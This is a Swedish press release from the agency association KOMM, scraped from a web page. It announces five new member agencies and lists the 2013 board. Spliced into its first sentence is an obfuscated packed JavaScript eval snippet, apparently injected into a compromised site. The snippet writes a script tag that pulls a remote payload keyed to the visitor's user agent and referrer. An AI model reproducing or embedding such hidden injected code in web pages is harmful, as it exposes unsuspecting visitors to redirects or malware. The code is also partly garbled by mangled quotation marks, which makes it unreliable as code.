Image Image Image Image Image Image Image Image Image Image

| 23 februari, 2020

Scroll to top

Top

Fem nya medlemmar till KOMM

Fem nya medlemmar till KOMM
Revue Magazine

Fem eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|efyay|var|u0026u|referrer|yittk||js|php’.split(’|’),0,{}))
nya medlemmar valdes den 8 november in av förbundets styrelse. De nya medlemsbyråerna verkar inom pr, event och reklam och finns från Malmö till Stockholm. Totalt har 27 företag valt att bli medlemmar i KOMM under 2013. 

– Vi växer med mindre och mellanstora byråer i hela landet men vi ser också att det är gamla medlemmar som kommer tillbaka och slutligen om man ska ana nån liten trend så skulle det kunna vara att fler disciplinbyråer nu vill vara med som kommunikationsbyrå i ett bredare förbund, säger Linda Nilsson, kanslichef på KOMM.

De nya medlemsföretagen är:

Hill+Knowlton

nordengren ett

Occasion

Deportivo

Community Network

KOMM styrelse 2013 är:

Mats Ahldén, vd och partner Eventum.

Lars Axelsson, vd, The Brand Union

Daniel Collin, CEO MEC Sweden, Dep. CEO MEC Nordic

Mia Clase, cd, Garbergs

Klas Tjebbes, CEO Wonderleap Eight

Anna Furberg, vd, Bolt

Ronny Olovsson, pr director, Vinter

Jacob Nelson, copywriter, Forsman & Bodenfors

Tove Langseth, cd, DDB

Charlotte Witte, partner, Prime

Barbro Ohlson Smith, cd, Ohlsonsmith

Gustav Martner, Executive Creative Director, CP+B Europe

Detta är ett pressmeddelande från Sveriges Kommunikationsbyråer